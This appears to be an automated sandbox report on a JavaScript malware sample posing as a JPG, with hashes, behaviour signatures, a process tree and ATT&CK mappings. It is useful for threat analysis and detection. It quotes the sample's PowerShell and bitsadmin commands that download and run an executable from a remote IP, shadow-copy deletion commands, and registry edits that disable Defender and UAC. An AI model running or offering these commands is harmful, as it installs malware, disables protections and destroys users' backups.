Analysis
- max time kernel: 125s
- max time network: 126s
- platform: windows10_x64
- resource: win10v200430
- submitted: 08-07-2020 01:25

Static task: static1

Behavioral task: behavioral1
- Sample: PIC180168.jpg.js
- Resource: win7

Behavioral task: behavioral2
- Sample: PIC180168.jpg.js
- Resource: win10v200430

General
- Target: PIC180168.jpg.js
- Size: 253KB
- MD5: 2c0a6e6f385e471bdb870a723e33cc4d
- SHA1: 07415191a13e6943eb2e0f41bdf6cf7acfa70156
- SHA256: 6389e3c49b6f4009ca0f1631436d481065a3b3cfab7a15a073edbb61dd971c73
- SHA512: 39ca7bbd702a4aede2f57406d57cf1e7a05128e2723372fe084e7db9bf69594fe904cfd5d6f6a92d4b95fda9edd575d10977a9f8b52ae526fbf19fc204746048
Malware Config
- Extracted: http://217.8.117.63/tspm.exe
Signatures

Download via BitsAdmin (1 TTP, 1 IoC)
Modifies Windows Defender Real-time Protection settings
Processes:
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"
Processes:
  2537425072.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
  2537425072.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
Suspicious use of WriteProcessMemory (35 IoCs)
Processes (source PID and image -> target PID and image; repeated table rows collapsed, with the number of recorded writes in parentheses):
  504 wscript.exe -> 808 cmd.exe (2)
  504 wscript.exe -> 1000 cmd.exe (2)
  808 cmd.exe -> 1184 powershell.exe (2)
  1000 cmd.exe -> 1288 bitsadmin.exe (2)
  1184 powershell.exe -> 2672 8468468468.exe (3)
  2672 8468468468.exe -> 4032 taskhostw.exe (3)
  4032 taskhostw.exe -> 3664 2537425072.exe (3)
  3664 2537425072.exe -> 736 wmic.exe (3)
  3664 2537425072.exe -> 2884 vssadmin.exe (3)
  3664 2537425072.exe -> 1336 wmic.exe (3)
  3664 2537425072.exe -> 2300 vssadmin.exe (3)
  3664 2537425072.exe -> 3824 wmic.exe (3)
  3664 2537425072.exe -> 3564 vssadmin.exe (3)
Suspicious use of AdjustPrivilegeToken (67 IoCs)
Processes (token privileges adjusted, grouped by process as listed in the report; the list for PID 3824 is cut off in the extracted page):
  powershell.exe (PID 1184): SeDebugPrivilege
  wmic.exe (PID 736): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  vssvc.exe (PID 1016): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  wmic.exe (PID 1336): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe (PID 3824): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Blacklisted process makes network request (1 IoC)
Processes:
  powershell.exe (PID 1184): flow 1
Processes:
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"
Processes:
  2537425072.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Adds Run entry to start application (2 TTPs, 2 IoCs)
Processes:
  8468468468.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\265618363602\\taskhostw.exe"
  8468468468.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\265618363602\\taskhostw.exe"
Enumerates connected drives (3 TTPs)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Drops file in Windows directory (3 IoCs)
Processes:
  8468468468.exe: File created C:\Windows\265618363602\taskhostw.exe
  8468468468.exe: File opened for modification C:\Windows\265618363602\taskhostw.exe
  8468468468.exe: File opened for modification C:\Windows\265618363602
Modifies service (2 TTPs, 4 IoCs)
Processes:
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Suspicious behavior: EnumeratesProcesses (613 IoCs)
Processes (the report lists the same two processes once per hit; the repeated rows are collapsed here):
  powershell.exe (PID 1184)
  2537425072.exe (PID 3664)
System policy modification (1 TTP, 1 IoC)
Processes:
  2537425072.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
Executes dropped EXE (3 IoCs)
Processes:
  8468468468.exe (PID 2672)
  taskhostw.exe (PID 4032)
  2537425072.exe (PID 3664)
Processes:
  taskhostw.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1"
Drops desktop.ini file(s) (1 IoC)
Processes:
  2537425072.exe: File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows:
  flow 11: api.myip.com
  flow 13: api.myip.com
Interacts with shadow copies (2 TTPs, 3 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  vssadmin.exe (PID 2884)
  vssadmin.exe (PID 2300)
  vssadmin.exe (PID 3564)
Processes (process tree; the bracketed number is the depth shown in the report)

[1] C:\Windows\system32\wscript.exe (PID 504)
    command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC180168.jpg.js
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe (PID 808)
      command line: "C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1184)
        command line: PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Blacklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
      [4] C:\Users\Admin\AppData\Local\Temp\8468468468.exe (PID 2672)
          command line: "C:\Users\Admin\AppData\Local\Temp\8468468468.exe"
          - Suspicious use of WriteProcessMemory
          - Adds Run entry to start application
          - Drops file in Windows directory
          - Executes dropped EXE
        [5] C:\Windows\265618363602\taskhostw.exe (PID 4032)
            command line: C:\Windows\265618363602\taskhostw.exe
            - Modifies Windows Defender Real-time Protection settings
            - Suspicious use of WriteProcessMemory
            - Windows security bypass
            - Executes dropped EXE
            - Windows security modification
          [6] C:\Users\Admin\AppData\Local\Temp\2537425072.exe (PID 3664)
              command line: C:\Users\Admin\AppData\Local\Temp\2537425072.exe
              - UAC bypass
              - Suspicious use of WriteProcessMemory
              - Checks whether UAC is enabled
              - Suspicious behavior: EnumeratesProcesses
              - System policy modification
              - Executes dropped EXE
              - Drops desktop.ini file(s)
            [7] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 736)
                command line: wmic.exe SHADOWCOPY /nointeractive
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\vssadmin.exe (PID 2884)
                command line: vssadmin.exe Delete Shadows /All /Quiet
                - Interacts with shadow copies
            [7] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 1336)
                command line: wmic.exe SHADOWCOPY /nointeractive
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\vssadmin.exe (PID 2300)
                command line: vssadmin.exe Delete Shadows /All /Quiet
                - Interacts with shadow copies
            [7] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 3824)
                command line: wmic.exe SHADOWCOPY /nointeractive
                - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\SysWOW64\vssadmin.exe (PID 3564)
                command line: vssadmin.exe Delete Shadows /All /Quiet
                - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe (PID 1000)
      command line: "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe&start C:\Users\Admin\AppData\Local\Temp\24624627.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\bitsadmin.exe (PID 1288)
        command line: bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe
        - Download via BitsAdmin

[1] C:\Windows\system32\vssvc.exe (PID 1016)
    command line: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service
Network
MITRE ATT&CK Enterprise v6

Persistence
- BITS Jobs (1)
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (1)

Defense Evasion
- BITS Jobs (1)
- Bypass User Account Control (1)
- Disabling Security Tools (4)
- File Deletion (2)
- Modify Registry (7)